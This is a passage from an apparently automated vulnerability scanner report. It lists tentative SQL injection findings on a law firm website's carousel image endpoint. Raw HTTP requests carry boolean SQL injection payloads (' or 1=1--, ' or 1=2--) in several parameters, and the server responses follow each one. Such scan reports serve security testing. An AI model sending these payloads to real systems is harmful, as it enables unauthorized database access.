...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm75027296'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
-->
...[SNIP]...

1.37. http://www.curtis.com/scripts/carousel/getimages.cfm [doctype parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The doctype parameter appears to be vulnerable to SQL injection attacks. The payloads 20635308'%20or%201%3d1--%20 and 20635308'%20or%201%3d2--%20 were each submitted in the doctype parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html20635308'%20or%201%3d1--%20&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html20635308'%20or%201%3d2--%20&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.38. http://www.curtis.com/scripts/carousel/getimages.cfm [first_last_buttons parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The first_last_buttons parameter appears to be vulnerable to SQL injection attacks. The payloads 21178287'%20or%201%3d1--%20 and 21178287'%20or%201%3d2--%20 were each submitted in the first_last_buttons parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no21178287'%20or%201%3d1--%20&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&w
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no21178287'%20or%201%3d2--%20&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&w
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.39. http://www.curtis.com/scripts/carousel/getimages.cfm [first_slide_is_intro parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The first_slide_is_intro parameter appears to be vulnerable to SQL injection attacks. The payloads 39183985'%20or%201%3d1--%20 and 39183985'%20or%201%3d2--%20 were each submitted in the first_slide_is_intro parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no39183985'%20or%201%3d1--%20&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no39183985'%20or%201%3d2--%20&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.40. http://www.curtis.com/scripts/carousel/getimages.cfm [hover_next_prev_buttons parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The hover_next_prev_buttons parameter appears to be vulnerable to SQL injection attacks. The payloads 11309222'%20or%201%3d1--%20 and 11309222'%20or%201%3d2--%20 were each submitted in the hover_next_prev_buttons parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no11309222'%20or%201%3d1--%20&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no11309222'%20or%201%3d2--%20&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.41. http://www.curtis.com/scripts/carousel/getimages.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 12395009%20or%201%3d1--%20 and 12395009%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 237

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no&112395009%20or%201%3d1--%20=1

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
